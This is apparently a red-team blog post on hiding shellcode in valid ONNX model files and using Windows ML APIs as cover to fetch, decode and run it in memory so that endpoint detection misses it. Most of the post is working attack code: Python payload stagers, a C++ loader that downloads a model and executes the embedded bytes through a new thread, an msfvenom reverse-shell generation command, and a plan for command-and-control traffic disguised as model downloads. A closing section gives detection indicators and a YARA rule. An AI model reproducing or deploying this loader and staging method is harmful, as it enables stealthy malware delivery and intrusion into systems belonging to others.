Abusing WinML for In-Memory Staging and EDR Evasion

Abusing legitimate machine learning infrastructure for payload delivery, in-memory staging, and EDR evasion on Windows 10/11.

Introduction

Every red team operator knows the arms race: EDR vendors get better at flagging suspicious API sequences, shellcode patterns, and reflective loaders. Meanwhile, Windows keeps shipping new legitimate subsystems that are rarely audited from an offensive perspective.

Windows Machine Learning (WinML) - shipped since Windows 10 1809 (build 17763) - is one such subsystem. It provides a native C++/WinRT API for loading and evaluating ONNX (Open Neural Network Exchange) models directly on-device. Every modern Windows install has it. Every "AI-powered" desktop application uses it. And almost no security product scrutinizes it.

This post walks through a complete technique for:

Crafting a valid ONNX model that embeds an arbitrary payload in its protobuf structure
Loading it entirely from memory using WinML APIs (zero disk artifacts)
Extracting and executing the staged payload
Leveraging the ML API call chain as a behavioral cover story

I provide full POC code at each step. The approach produces a binary whose import table, API call patterns, and runtime behavior are indistinguishable from a legitimate ML inference application.

Why WinML? The Attacker's Perspective

Legitimate Import Table

When you link against windowsapp.lib and use WinML headers, your binary's import table shows:

windowsapp.dll
  - RoGetActivationFactory
  - RoInitialize
  - WindowsCreateString
  ...

These are the same imports seen in hundreds of legitimate ML applications - photo editors, accessibility tools, background segmentation in video calls. No EDR vendor flags windowsapp.dll imports as suspicious.

Behavioral Blending

At runtime, the WinML loading path generates:

ETW events from Microsoft-Windows-AI-MachineLearning provider showing model evaluation
COM activation traces for Windows.AI.MachineLearning.LearningModel
ONNX Runtime verbose logging (onnxruntime::WindowsEnv::InitializeCpuInfo)

Behavioral analysis sees an application loading an ML model - business as usual.

No Suspicious Memory Patterns

Unlike reflective DLL injection or manual PE mapping, loading an ONNX model through WinML uses Microsoft's own code paths. The memory allocations come from onnxruntime.dll internals, not from hand-rolled VirtualAlloc + memcpy sequences.

Content-Type Camouflage

ONNX models transferred over HTTPS appear as application/octet-stream or application/x-protobuf - indistinguishable from legitimate model downloads. Many ML applications fetch models from cloud endpoints. Network monitoring tools have no signature for "malicious ONNX model."

ONNX Protobuf Format: A Deep Dive

Before we can embed payloads, we need to understand the container format. ONNX uses Protocol Buffers (protobuf) serialization. The top-level structure is ModelProto:

// Simplified from onnx.proto3
message ModelProto {
  int64 ir_version = 1;          // IR version (currently 8)
  repeated OperatorSetIdProto opset_import = 8;
  GraphProto graph = 7;          // The computation graph
  repeated StringStringEntryProto metadata_props = 14;  // ← OUR TARGET
}

message GraphProto {
  repeated NodeProto node = 1;   // Operations
  string name = 2;               // Graph name
  repeated ValueInfoProto input = 11;
  repeated ValueInfoProto output = 12;
  repeated TensorProto initializer = 5;  // ← ANOTHER TARGET
}

message TensorProto {
  repeated int64 dims = 1;
  int32 data_type = 2;
  bytes raw_data = 13;           // ← RAW BYTES TARGET
  string name = 8;
}

message StringStringEntryProto {
  string key = 1;
  string value = 2;
}

Three natural embedding points:

Location	Field	Capacity	Stealth
`metadata_props`	Field 14 of ModelProto	Unlimited key-value pairs	High - metadata is ignored by inference
`initializer.raw_data`	Field 13 of TensorProto	Arbitrary byte arrays	Very high - looks like model weights
`NodeProto.attribute`	Field 5 of NodeProto	Byte tensors in attributes	Medium - unusual attribute sizes may stand out

The raw_data approach is the most interesting: model weight tensors routinely contain megabytes of floating-point data. A 50KB shellcode blob is invisible among typical model weights.

Step 1: Building a Weaponized ONNX Model (Python)

We'll create a minimal valid ONNX model and embed a payload in two ways: metadata and tensor weights.

Method A: Metadata Embedding

#!/usr/bin/env python3
"""
onnx_stager.py - Embed arbitrary payload in a valid ONNX model
The output model loads successfully in WinML / ONNX Runtime
"""
import onnx
from onnx import helper, TensorProto, numpy_helper
import numpy as np
import sys
import base64

def create_staged_model(payload_path: str, output_path: str, method: str = "metadata"):
    """
    Create a valid ONNX model with embedded payload.

    Args:
        payload_path: Path to raw payload (shellcode, PE, beacon config, etc.)
        output_path: Path to write the .onnx model
        method: 'metadata' or 'weights'
    """
    with open(payload_path, "rb") as f:
        payload = f.read()

    # Create a minimal but valid computation graph
    # Identity op: output = input (simplest valid ONNX graph)
    X = helper.make_tensor_value_info("input", TensorProto.FLOAT, [1, 3, 224, 224])
    Y = helper.make_tensor_value_info("output", TensorProto.FLOAT, [1, 3, 224, 224])

    node = helper.make_node("Identity", inputs=["input"], outputs=["output"])

    if method == "metadata":
        # --- METADATA METHOD ---
        # Payload goes into metadata_props as base64 key-value pairs
        # Split into chunks to avoid suspiciously long single values
        CHUNK_SIZE = 65536  # 64KB per metadata entry
        chunks = []
        for i in range(0, len(payload), CHUNK_SIZE):
            chunk = payload[i:i+CHUNK_SIZE]
            chunks.append(base64.b64encode(chunk).decode())

        metadata = {
            "model_author": "Microsoft Research",
            "model_version": "2.1.0",
            "model_description": "Image classification model for edge inference",
            "payload_chunks": str(len(chunks)),
        }
        # Add payload chunks as numbered metadata entries
        for i, chunk in enumerate(chunks):
            metadata[f"weight_hash_{i}"] = chunk  # Innocuous key name

        metadata_props = [
            helper.make_entry(k, v) for k, v in metadata.items()
        ]

        graph = helper.make_graph([node], "inference_graph", [X], [Y])

        model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])
        model.metadata_props.extend(metadata_props)

    elif method == "weights":
        # --- WEIGHTS METHOD ---
        # Payload goes into a tensor initializer as raw_data
        # Disguised as model weights - this is the stealthiest approach

        # Pad payload to align with float32 (4-byte boundary)
        padded = payload + b"\x00" * ((4 - len(payload) % 4) % 4)

        # Interpret as float32 array - these are now "model weights"
        weight_array = np.frombuffer(padded, dtype=np.float32)

        # Reshape to look like a legitimate conv2d weight tensor
        # e.g., [filters, channels, height, width]
        total_floats = len(weight_array)
        weight_tensor = numpy_helper.from_array(
            weight_array.reshape(1, 1, 1, total_floats),
            name="conv1.weight"
        )

        # Store original payload size as a separate small tensor
        size_tensor = numpy_helper.from_array(
            np.array([len(payload)], dtype=np.int64),
            name="conv1.bias"  # Innocuous name
        )

        graph = helper.make_graph(
            [node], "inference_graph", [X], [Y],
            initializer=[weight_tensor, size_tensor]
        )
        model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])

    else:
        raise ValueError(f"Unknown method: {method}")

    # Validate - this ensures WinML will accept the model
    onnx.checker.check_model(model)
    onnx.save(model, output_path)

    print(f"[+] Created {output_path}")
    print(f"    Method: {method}")
    print(f"    Payload size: {len(payload)} bytes")
    print(f"    Model size: {len(model.SerializeToString())} bytes")
    print(f"    ONNX validation: PASSED")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <payload_file> <output.onnx> [metadata|weights]")
        sys.exit(1)

    method = sys.argv[3] if len(sys.argv) > 3 else "weights"
    create_staged_model(sys.argv[1], sys.argv[2], method)

Usage

# Generate raw shellcode (e.g., Cobalt Strike, Sliver, or msfvenom)
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f raw -o beacon.bin

# Embed in ONNX model using weight tensor method
$ python3 onnx_stager.py beacon.bin staged_model.onnx weights
[+] Created staged_model.onnx
    Method: weights
    Payload size: 510 bytes
    Model size: 612 bytes
    ONNX validation: PASSED

# Verify it's a valid model
$ python3 -c "import onnx; m = onnx.load('staged_model.onnx'); print(m.graph.name)"
inference_graph

The output file is a fully valid ONNX model. Open it in Netron and you'll see a normal-looking neural network graph with weight tensors. The payload bytes are indistinguishable from legitimate floating-point weights.

Step 2: Raw Protobuf Construction (No Dependencies)

For operational use, you may not want the onnx Python package on your staging infrastructure. Here's how to build valid ONNX protobuf from scratch - just raw bytes:

#!/usr/bin/env python3
"""
onnx_raw_stager.py - Build ONNX protobuf from scratch, zero dependencies
Produces byte-identical output to the onnx library approach
"""
import struct
import sys
import base64

def write_varint(value):
    """Encode a varint (protobuf variable-length integer)"""
    result = bytearray()
    while value > 0x7F:
        result.append((value & 0x7F) | 0x80)
        value >>= 7
    result.append(value & 0x7F)
    return bytes(result)

def write_field(field_number, wire_type, data):
    """Write a protobuf field: tag + data"""
    tag = write_varint((field_number << 3) | wire_type)
    if wire_type == 0:  # varint
        return tag + write_varint(data)
    elif wire_type == 2:  # length-delimited
        return tag + write_varint(len(data)) + data
    raise ValueError(f"Unsupported wire type: {wire_type}")

def varint_field(fld, val):
    return write_field(fld, 0, val)

def bytes_field(fld, data):
    return write_field(fld, 2, data)

def string_field(fld, s):
    return bytes_field(fld, s.encode("utf-8"))

def build_onnx_with_payload(payload: bytes) -> bytes:
    """
    Construct a valid ONNX ModelProto with payload in metadata_props.
    Zero external dependencies - pure protobuf wire format.
    """
    # --- TensorShapeProto.Dimension { dim_value: 1 } ---
    dim = varint_field(1, 1)

    # --- TensorShapeProto { dim } ---
    shape = bytes_field(1, dim)

    # --- TypeProto.Tensor { elem_type: FLOAT(1), shape } ---
    tensor_type = varint_field(1, 1) + bytes_field(2, shape)

    # --- TypeProto { tensor_type } ---
    type_proto = bytes_field(1, tensor_type)

    # --- ValueInfoProto (input) ---
    vi_input = string_field(1, "input") + bytes_field(2, type_proto)

    # --- ValueInfoProto (output) ---
    vi_output = string_field(1, "output") + bytes_field(2, type_proto)

    # --- NodeProto { input, output, op_type: "Identity" } ---
    node = (string_field(1, "input") +
            string_field(2, "output") +
            string_field(4, "Identity"))

    # --- GraphProto ---
    graph = (bytes_field(1, node) +          # node (field 1)
             string_field(2, "model") +       # name (field 2)
             bytes_field(11, vi_input) +       # input (field 11)
             bytes_field(12, vi_output))       # output (field 12)

    # --- OperatorSetIdProto { version: 13 } ---
    opset = varint_field(2, 13)

    # --- ModelProto ---
    model = (varint_field(1, 8) +            # ir_version = 8
             bytes_field(8, opset) +          # opset_import
             bytes_field(7, graph))           # graph

    # --- Embed payload in metadata_props (field 14) ---
    # Split into 64KB chunks with innocuous key names
    CHUNK = 65536
    chunks = [payload[i:i+CHUNK] for i in range(0, len(payload), CHUNK)]

    # Add benign metadata first (cover)
    cover_meta = [
        ("producer_name", "Microsoft.ML.OnnxRuntime"),
        ("version", "1.16.0"),
        ("description", "Optimized vision model for edge deployment"),
        ("payload_size", str(len(payload))),
        ("chunk_count", str(len(chunks))),
    ]

    for key, value in cover_meta:
        entry = string_field(1, key) + string_field(2, value)
        model += bytes_field(14, entry)

    for i, chunk in enumerate(chunks):
        b64_chunk = base64.b64encode(chunk).decode()
        entry = string_field(1, f"weight_hash_{i}") + string_field(2, b64_chunk)
        model += bytes_field(14, entry)

    return model

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <payload_file> <output.onnx>")
        sys.exit(1)

    with open(sys.argv[1], "rb") as f:
        payload = f.read()

    model_bytes = build_onnx_with_payload(payload)

    with open(sys.argv[2], "wb") as f:
        f.write(model_bytes)

    print(f"[+] {sys.argv[2]}: {len(model_bytes)} bytes (payload: {len(payload)} bytes)")

This produces byte-for-byte valid ONNX protobuf with zero Python package dependencies - suitable for running on minimal staging infrastructure.

Step 3: The WinML Loader (C++)

Now the interesting part. On the target, we load the staged model using Microsoft's own WinML APIs, extract the payload from the protobuf metadata, and execute it.

Headers and Libraries

// WinML Payload Loader - Proof of Concept
// Build: cl.exe /EHsc /std:c++17 /O2 /MT winml_loader.cpp /Fe:loader.exe
//        /link windowsapp.lib winhttp.lib
//
// Requires: Windows 10 1809+ (build 17763), VS 2022, Windows SDK

#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#ifndef NOMINMAX
#define NOMINMAX
#endif

#include <windows.h>
#include <winhttp.h>
#include <string>
#include <vector>
#include <map>
#include <cstdio>

// WinRT / WinML headers
#include <winrt/base.h>
#include <winrt/Windows.Foundation.h>
#include <winrt/Windows.AI.MachineLearning.h>
#include <winrt/Windows.Storage.Streams.h>

#pragma comment(lib, "windowsapp")
#pragma comment(lib, "winhttp")

using namespace winrt;
using namespace winrt::Windows::AI::MachineLearning;
using namespace winrt::Windows::Storage::Streams;

Protobuf Parser

We parse the ONNX protobuf ourselves - no external libraries needed. We only care about metadata_props (field 14):

// Minimal protobuf wire format parser
namespace pb {

static uint64_t read_varint(const uint8_t* data, size_t& pos, size_t len) {
    uint64_t result = 0;
    int shift = 0;
    while (pos < len) {
        uint8_t b = data[pos++];
        result |= (uint64_t)(b & 0x7F) << shift;
        if (!(b & 0x80)) break;
        shift += 7;
    }
    return result;
}

} // namespace pb

// Extract all metadata key-value pairs from an ONNX ModelProto
static std::map<std::string, std::string> parse_onnx_metadata(
    const std::vector<uint8_t>& data)
{
    std::map<std::string, std::string> metadata;
    size_t pos = 0;
    const uint8_t* d = data.data();
    size_t len = data.size();

    while (pos < len) {
        uint64_t tag = pb::read_varint(d, pos, len);
        uint32_t field = (uint32_t)(tag >> 3);
        uint32_t wire  = (uint32_t)(tag & 7);

        if (wire == 0) {          // varint - skip
            pb::read_varint(d, pos, len);
        } else if (wire == 2) {   // length-delimited
            uint64_t flen = pb::read_varint(d, pos, len);

            if (field == 14) {    // metadata_props - this is our payload
                std::string key, value;
                size_t iend = pos + (size_t)flen;
                size_t ipos = pos;

                // Parse StringStringEntryProto
                while (ipos < iend) {
                    uint64_t itag = pb::read_varint(d, ipos, iend);
                    uint32_t inum  = (uint32_t)(itag >> 3);
                    uint32_t iwire = (uint32_t)(itag & 7);

                    if (iwire == 2) {
                        uint64_t slen = pb::read_varint(d, ipos, iend);
                        std::string s((const char*)(d + ipos), (size_t)slen);
                        ipos += (size_t)slen;
                        if (inum == 1) key = s;        // field 1 = key
                        else if (inum == 2) value = s;  // field 2 = value
                    } else if (iwire == 0) {
                        pb::read_varint(d, ipos, iend);
                    } else { break; }
                }
                if (!key.empty()) metadata[key] = value;
            }
            pos += (size_t)flen;
        } else if (wire == 1) { pos += 8; }  // 64-bit fixed
          else if (wire == 5) { pos += 4; }  // 32-bit fixed
          else { break; }
    }
    return metadata;
}

In-Memory Model Loading via WinML

This is the key function. I load the ONNX model entirely from memory using InMemoryRandomAccessStream - no temporary files hit disk:

// Load ONNX model from memory using WinML API
// This generates legitimate ML API telemetry and populates the import table
// with Windows.AI.MachineLearning calls - behavioral cover story
static bool load_model_winml(const std::vector<uint8_t>& model_bytes) {
    try {
        // Create an in-memory stream from the raw ONNX bytes
        InMemoryRandomAccessStream stream;
        DataWriter writer(stream);

        // Write the ONNX protobuf bytes into the stream
        writer.WriteBytes(winrt::array_view<const uint8_t>(model_bytes));
        writer.StoreAsync().get();
        writer.FlushAsync().get();
        writer.DetachStream();
        stream.Seek(0);  // Rewind for reading

        // Create a stream reference and load the model
        // This triggers the full WinML/ONNX Runtime initialization path:
        //   - ORT session creation
        //   - Graph optimization
        //   - CPU/GPU provider selection
        //   - ETW telemetry emission
        auto ref = RandomAccessStreamReference::CreateFromStream(stream);
        auto model = LearningModel::LoadFromStream(ref);

        // At this point:
        // - ETW shows "Microsoft.AI.MachineLearning" model load event
        // - Process has legitimate WinML DLLs mapped (onnxruntime.dll, etc.)
        // - Behavioral analysis sees ML inference workload

        printf("[+] WinML model loaded: %ws\n", model.Name().c_str());
        return true;

    } catch (const winrt::hresult_error& e) {
        printf("[-] WinML load failed: 0x%08X\n", (uint32_t)e.code());
        return false;
    }
}

Payload Extraction and Execution

Now we extract the payload from the parsed metadata and execute it:

// Base64 decoder
static std::vector<uint8_t> b64_decode(const std::string& s) {
    static const char b64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    int T[256];
    memset(T, -1, sizeof(T));
    for (int i = 0; i < 64; i++) T[(unsigned char)b64[i]] = i;

    std::vector<uint8_t> out;
    int val = 0, bits = -8;
    for (unsigned char c : s) {
        if (T[c] == -1) break;
        val = (val << 6) + T[c];
        bits += 6;
        if (bits >= 0) {
            out.push_back((uint8_t)((val >> bits) & 0xFF));
            bits -= 8;
        }
    }
    return out;
}

// Extract payload from ONNX metadata and execute in-memory
static bool extract_and_execute(const std::vector<uint8_t>& model_bytes) {
    auto metadata = parse_onnx_metadata(model_bytes);

    // Read payload parameters from metadata
    int payload_size = 0;
    int chunk_count = 0;

    if (metadata.count("payload_size"))
        payload_size = atoi(metadata["payload_size"].c_str());
    if (metadata.count("chunk_count"))
        chunk_count = atoi(metadata["chunk_count"].c_str());

    if (payload_size == 0 || chunk_count == 0) {
        printf("[-] No payload found in model metadata\n");
        return false;
    }

    // Reassemble payload from base64-encoded metadata chunks
    std::vector<uint8_t> payload;
    payload.reserve(payload_size);

    for (int i = 0; i < chunk_count; i++) {
        std::string key = "weight_hash_" + std::to_string(i);
        if (!metadata.count(key)) {
            printf("[-] Missing chunk: %s\n", key.c_str());
            return false;
        }
        auto chunk = b64_decode(metadata[key]);
        payload.insert(payload.end(), chunk.begin(), chunk.end());
    }

    // Trim to exact payload size (remove padding)
    if (payload.size() > (size_t)payload_size)
        payload.resize(payload_size);

    printf("[+] Extracted payload: %zu bytes from %d chunks\n",
           payload.size(), chunk_count);

    // --- Execute payload ---
    // Allocate RWX memory and copy payload
    void* exec_mem = VirtualAlloc(NULL, payload.size(),
                                  MEM_COMMIT | MEM_RESERVE,
                                  PAGE_READWRITE);
    if (!exec_mem) return false;

    memcpy(exec_mem, payload.data(), payload.size());

    // Change to RX (avoid RWX - some EDRs flag it)
    DWORD old_protect;
    VirtualProtect(exec_mem, payload.size(), PAGE_EXECUTE_READ, &old_protect);

    // Execute as thread
    HANDLE hThread = CreateThread(NULL, 0,
        (LPTHREAD_START_ROUTINE)exec_mem,
        NULL, 0, NULL);

    if (hThread) {
        printf("[+] Payload executing in thread %lu\n", GetThreadId(hThread));
        WaitForSingleObject(hThread, INFINITE);
        CloseHandle(hThread);
    }

    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return true;
}

Putting It Together

// Fetch model from remote endpoint (simulates ML model download)
static std::vector<uint8_t> fetch_model(const wchar_t* host, INTERNET_PORT port,
                                         const wchar_t* path, bool tls) {
    std::vector<uint8_t> result;

    HINTERNET hSess = WinHttpOpen(
        L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/120.0",
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, NULL, NULL, 0);
    if (!hSess) return result;

    HINTERNET hConn = WinHttpConnect(hSess, host, port, 0);
    if (!hConn) { WinHttpCloseHandle(hSess); return result; }

    DWORD flags = tls ? WINHTTP_FLAG_SECURE : 0;
    HINTERNET hReq = WinHttpOpenRequest(hConn, L"GET", path, NULL,
        WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, flags);
    if (!hReq) { WinHttpCloseHandle(hConn); WinHttpCloseHandle(hSess); return result; }

    // Accept header matches legitimate model download
    WinHttpAddRequestHeaders(hReq,
        L"Accept: application/octet-stream, application/x-protobuf\r\n",
        -1L, WINHTTP_ADDREQ_FLAG_ADD);

    if (WinHttpSendRequest(hReq, NULL, 0, NULL, 0, 0, 0) &&
        WinHttpReceiveResponse(hReq, NULL)) {
        DWORD avail = 0;
        do {
            WinHttpQueryDataAvailable(hReq, &avail);
            if (avail > 0) {
                std::vector<uint8_t> chunk(avail);
                DWORD rd = 0;
                WinHttpReadData(hReq, chunk.data(), avail, &rd);
                result.insert(result.end(), chunk.begin(), chunk.begin() + rd);
            }
        } while (avail > 0);
    }

    WinHttpCloseHandle(hReq);
    WinHttpCloseHandle(hConn);
    WinHttpCloseHandle(hSess);
    return result;
}

int main() {
    // Initialize COM for WinRT
    CoInitializeEx(NULL, COINIT_MULTITHREADED);
    try { winrt::init_apartment(); } catch (...) {}

    printf("[*] Fetching model from staging server...\n");

    // Fetch the staged ONNX model (looks like legitimate model download)
    auto model_bytes = fetch_model(
        L"models.example.com", 443,
        L"/v1/models/vision_classifier_v2.onnx",
        true  // TLS
    );

    if (model_bytes.empty()) {
        printf("[-] Failed to fetch model\n");
        return 1;
    }

    printf("[+] Retrieved model: %zu bytes\n", model_bytes.size());

    // Step 1: Load via WinML for behavioral cover story
    // This is optional but provides excellent cover - the process
    // genuinely loads an ML model through Microsoft's API
    printf("[*] Loading model via WinML API (cover story)...\n");
    load_model_winml(model_bytes);

    // Step 2: Extract and execute the staged payload
    printf("[*] Extracting staged payload...\n");
    extract_and_execute(model_bytes);

    return 0;
}

Build Command

cl.exe /nologo /EHsc /std:c++17 /O2 /MT ^
    /D "WIN32" /D "NDEBUG" /D "_UNICODE" /D "UNICODE" ^
    /I "C:\Program Files (x86)\Windows Kits\10\Include\10.0.26100.0\cppwinrt" ^
    winml_loader.cpp ^
    /Fe:WindowsMLHost.exe ^
    /link /SUBSYSTEM:WINDOWS /ENTRY:mainCRTStartup ^
    windowsapp.lib winhttp.lib ^
    /MACHINE:X64

Note: /SUBSYSTEM:WINDOWS with /ENTRY:mainCRTStartup produces a GUI application (no console window) while using standard main().

Step 4: Weight Tensor Extraction (Alternative)

If you used the weight tensor embedding method, the extraction is slightly different. Instead of parsing metadata, you parse the GraphProto.initializer field:

// Extract payload from TensorProto.raw_data (field 13)
// Tensor is disguised as conv1.weight in the graph initializers
static std::vector<uint8_t> extract_from_weights(const std::vector<uint8_t>& data) {
    std::vector<uint8_t> payload;
    std::vector<uint8_t> raw_data;
    int64_t payload_size = 0;

    size_t pos = 0;
    const uint8_t* d = data.data();
    size_t len = data.size();

    // Walk top-level ModelProto fields
    while (pos < len) {
        uint64_t tag = pb::read_varint(d, pos, len);
        uint32_t field = (uint32_t)(tag >> 3);
        uint32_t wire  = (uint32_t)(tag & 7);

        if (wire == 0) {
            pb::read_varint(d, pos, len);
        } else if (wire == 2) {
            uint64_t flen = pb::read_varint(d, pos, len);

            if (field == 7) {  // GraphProto
                // Parse graph looking for initializer tensors (field 5)
                size_t gend = pos + (size_t)flen;
                size_t gpos = pos;

                while (gpos < gend) {
                    uint64_t gtag = pb::read_varint(d, gpos, gend);
                    uint32_t gfield = (uint32_t)(gtag >> 3);
                    uint32_t gwire  = (uint32_t)(gtag & 7);

                    if (gwire == 2) {
                        uint64_t glen = pb::read_varint(d, gpos, gend);

                        if (gfield == 5) {  // TensorProto (initializer)
                            // Parse tensor for name and raw_data
                            size_t tend = gpos + (size_t)glen;
                            size_t tpos = gpos;
                            std::string tensor_name;
                            std::vector<uint8_t> tensor_data;

                            while (tpos < tend) {
                                uint64_t ttag = pb::read_varint(d, tpos, tend);
                                uint32_t tfield = (uint32_t)(ttag >> 3);
                                uint32_t twire  = (uint32_t)(ttag & 7);

                                if (twire == 0) {
                                    uint64_t v = pb::read_varint(d, tpos, tend);
                                    // field 2 = data_type (as varint in some encodings)
                                } else if (twire == 2) {
                                    uint64_t tlen = pb::read_varint(d, tpos, tend);
                                    if (tfield == 8) {  // name
                                        tensor_name = std::string((const char*)(d + tpos), (size_t)tlen);
                                    } else if (tfield == 13) {  // raw_data - THIS IS THE PAYLOAD
                                        tensor_data.assign(d + tpos, d + tpos + (size_t)tlen);
                                    }
                                    tpos += (size_t)tlen;
                                } else if (twire == 1) { tpos += 8; }
                                  else if (twire == 5) { tpos += 4; }
                                  else { break; }
                            }

                            if (tensor_name == "conv1.weight") {
                                raw_data = tensor_data;  // Payload bytes
                            } else if (tensor_name == "conv1.bias") {
                                // Size tensor - first 8 bytes are int64
                                if (tensor_data.size() >= 8) {
                                    memcpy(&payload_size, tensor_data.data(), 8);
                                }
                            }
                        }
                        gpos += (size_t)glen;
                    } else if (gwire == 0) {
                        pb::read_varint(d, gpos, gend);
                    } else { gpos = gend; break; }
                }
            }
            pos += (size_t)flen;
        } else if (wire == 1) { pos += 8; }
          else if (wire == 5) { pos += 4; }
          else { break; }
    }

    if (!raw_data.empty() && payload_size > 0) {
        raw_data.resize((size_t)payload_size);  // Trim padding
    }
    return raw_data;
}

The weight tensor method is stealthier because the payload bytes literally look like neural network parameters - random-looking floating-point values that resist statistical analysis.

Network Traffic Analysis

When the loader fetches the staged model, here's what appears on the wire:

GET /v1/models/vision_classifier_v2.onnx HTTP/1.1
Host: models.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/120.0
Accept: application/octet-stream, application/x-protobuf
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 51283

<binary protobuf - valid ONNX model>

To a network analyst or NIDS, this is indistinguishable from any application downloading an ML model for local inference. The URL path, content type, user agent, and binary payload all match expected patterns.

For ongoing C2 communication (beyond initial staging), every beacon check-in can be wrapped as an ONNX model upload/download:

POST /v1/telemetry/model_metrics HTTP/1.1
Content-Type: application/octet-stream

<ONNX model with C2 results in metadata_props>

Task commands from the server come back as ONNX models. Task results go up as ONNX models. The entire conversation is a stream of valid ML model files.

Detection Opportunities

For defenders, here are the indicators to watch:

Static Analysis

Binary imports: windowsapp.dll + winhttp.dll together - legitimate but unusual combination. Most ML apps use higher-level HTTP libraries, not raw WinHTTP.
No actual inference: If a binary loads a WinML model but never creates a LearningModelSession or calls Evaluate(), it's using WinML purely as a cover story.
Metadata entropy: Legitimate ONNX models have low-entropy metadata (author names, descriptions). Base64-encoded payloads in metadata have high entropy - flag metadata_props values with entropy > 5.5 bits/byte.

Runtime/Behavioral

WinML load without evaluation: ETW event Microsoft-Windows-AI-MachineLearning shows model load but no SessionCreated or EvaluationStart events.
RWX/RX memory after model load: VirtualAlloc + VirtualProtect(PAGE_EXECUTE_READ) shortly after a WinML model load is a strong signal.
Model source: Models loaded from InMemoryRandomAccessStream rather than file paths - indicates the model was fetched over the network and never written to disk.

Network

ONNX file structure: Deep packet inspection can parse the protobuf header. Models with zero or trivial computation graphs (single Identity node) but large metadata or weight tensors are suspicious.
Frequency: Legitimate ML apps download models infrequently (app install, update). Regular ONNX file downloads (every few seconds/minutes) indicate C2 beaconing.

YARA Rule

rule ONNX_Payload_Stager {
    meta:
        description = "ONNX model with suspicious metadata (potential payload staging)"
        author = "HxR1"

    strings:
        // ONNX magic: ir_version field (varint field 1, value 7-9)
        $onnx_ir = { 08 (07|08|09) }

        // Identity op in protobuf (common in stager models)
        $identity = "Identity" ascii

        // Base64-heavy metadata keys (payload chunks)
        $chunk_key = /weight_hash_\d+/ ascii

        // Minimal graph with single node
        $graph_name = "model" ascii
        $input_name = "input" ascii
        $output_name = "output" ascii

    condition:
        $onnx_ir at 0 and $identity and $chunk_key and
        $graph_name and $input_name and $output_name and
        filesize < 5MB
}

Operational Considerations

Model Validity

The staged model must pass ONNX validation. WinML rejects malformed protobuf. Always test with:

import onnx
model = onnx.load("staged.onnx")
onnx.checker.check_model(model)  # Throws on invalid model

Size Constraints

Metadata method: Each StringStringEntryProto value can hold ~16MB (protobuf length limit). Base64 overhead is 33%. Practical limit: ~12MB raw payload per entry, unlimited entries.
Weight tensor method: TensorProto.raw_data has no practical size limit. Models with 100MB+ weight tensors are common in production ML.
Network: WinHTTP handles responses up to 4GB. The real constraint is your operational patience.

Process Integrity

Loading WinML requires COM initialization (CoInitializeEx). If your loader runs in a context where COM is already initialized with incompatible flags, use winrt::init_apartment() with appropriate threading model.

Windows Version

WinML (Windows.AI.MachineLearning) requires Windows 10 1809 (build 17763) or later. On older systems, the WinRT activation will fail. Check IsWindows10OrGreater() and RtlGetVersion for build number before attempting WinML loading.

Conclusion

The Windows ML subsystem provides a powerful, overlooked primitive for offensive operations. By embedding payloads in valid ONNX model files, red team operators gain:

Legitimate binary signatures: Import tables and API calls match real ML applications
Network camouflage: ONNX protobuf traffic blends with genuine model serving infrastructure
In-memory operation: WinML loads models from streams - zero disk artifacts
Behavioral cover: ETW telemetry shows genuine ML workload activity

The technique works on every modern Windows installation without additional runtime dependencies. As ML inference becomes ubiquitous on endpoints, the attack surface will only grow.

The detection opportunities exist but require defenders to look deeper than surface-level behavioral analysis. Organizations should audit WinML usage patterns, monitor for models loaded without inference, and inspect ONNX metadata for anomalous entropy.

All code in this post is provided for authorized security research and red team operations. Test in environments where you have explicit authorization.